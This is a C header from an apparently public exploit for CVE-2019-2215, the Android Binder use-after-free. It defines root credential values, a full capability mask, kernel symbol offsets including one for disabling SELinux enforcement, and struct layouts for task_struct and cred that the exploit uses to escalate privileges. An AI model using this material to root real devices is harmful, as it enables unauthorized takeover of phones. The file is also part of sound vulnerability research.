/*++

   ## # # ###     ### ###  #  ###     ### ###  #  ###
  #   # # #         # # # ##  # #       #   # ##  #
  #   # # ##  ### ### # #  #  ### ### ### ###  #  ###
  #   # # #       #   # #  #    #     #   #    #    #
   ##  #  ###     ### ### ### ###     ### ### ### ###
                                         @HackSysTeam

                    CVE-2019-2215
            Android Binder Use after Free
            CloudFuzz TechnoLabs Pvt. Ltd.

 https://groups.google.com/d/msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ
 https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
 https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html

 Thanks:
    @maddiestone
    @tehjh

--*/

#pragma once

#ifndef __COMMON_H__
#define __COMMON_H__

#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>


/**
 * Defines
 */

#define BANNER \
        "                                                     \n" \
        "  ## # # ###     ### ###  #  ###     ### ###  #  ### \n" \
        " #   # # #         # # # ##  # #       #   # ##  #   \n" \
        " #   # # ##  ### ### # #  #  ### ### ### ###  #  ### \n" \
        " #   # # #       #   # #  #    #     #   #    #    # \n" \
        "  ##  #  ###     ### ### ### ###     ### ### ### ### \n" \
        "                                        @HackSysTeam \n" \
        "                                                     \n"

#define INFO(...) printf(__VA_ARGS__)
#define ERR(...) printf(__VA_ARGS__)


#define OFFSET_TASK_STRUCT_ADDR_LIMIT 0xA18

#define GLOBAL_ROOT_UID     (uint32_t)0
#define GLOBAL_ROOT_GID     (uint32_t)0
#define SECUREBITS_DEFAULT  (uint32_t)0x00000000
#define CAP_EMPTY_SET       (uint64_t)0
#define CAP_FULL_SET        (uint64_t)0x3FFFFFFFFF


/**
 * System.map
 *
 * ffffffff80200000 T _stext
 * ffffffff816acfe8 B selinux_enforcing
 * ffffffff81433ac0 D init_nsproxy
 */

//
// offset = 0xffffffff81433ac0 - 0xffffffff80200000
//

#define SYMBOL_OFFSET_init_nsproxy      (ptrdiff_t)0x1233ac0

//
// I have found that this offset changes every compile.
// If the exploit fails in patching selinux_enforcing,
// try updating this offset
//

#define SYMBOL_OFFSET_selinux_enforcing (ptrdiff_t)0x14acfe8


/**
 * Data structures
 */

struct binder_thread {
    uint8_t junk1[160];         /*    0    0xa0 */
    uint8_t wait[24];           /* 0xa0    0x18 */
    uint8_t junk2[224];         /* 0xb8    0xe0 */
} __attribute__((packed));      /* size:  0x198 */


struct task_struct {
    uint8_t junk1[1256];        /*     0  0x4e8 */
    pid_t pid;                  /* 0x4e8    0x4 */
    uint8_t junk2[412];         /* 0x4ec  0x19c */
    uint64_t cred;              /* 0x688    0x8 */
    uint8_t junk3[48];          /* 0x690   0x30 */
    uint64_t nsproxy;           /* 0x6c0    0x8 */
    uint8_t junk4[1944];        /* 0x6c8  0x798 */
} __attribute__((packed));      /* size:  0xe60 */


struct cred {
    int32_t usage;              /*    0    0x4 */
    uint32_t uid;               /*  0x4    0x4 */
    uint32_t gid;               /*  0x8    0x4 */
    uint32_t suid;              /*  0xc    0x4 */
    uint32_t sgid;              /* 0x10    0x4 */
    uint32_t euid;              /* 0x14    0x4 */
    uint32_t egid;              /* 0x18    0x4 */
    uint32_t fsuid;             /* 0x1c    0x4 */
    uint32_t fsgid;             /* 0x20    0x4 */
    uint32_t securebits;        /* 0x24    0x4 */
    uint64_t cap_inheritable;   /* 0x28    0x8 */
    uint64_t cap_permitted;     /* 0x30    0x8 */
    uint64_t cap_effective;     /* 0x38    0x8 */
    uint64_t cap_bset;          /* 0x40    0x8 */
    uint64_t cap_ambient;       /* 0x48    0x8 */
    uint8_t junk2[40];          /* 0x50   0x28 */
    void *security;             /* 0x78    0x8 */
    uint8_t junk3[40];          /* 0x80   0x28 */
} __attribute__((packed));      /* size:  0xA8 */

#endif //__COMMON_H__
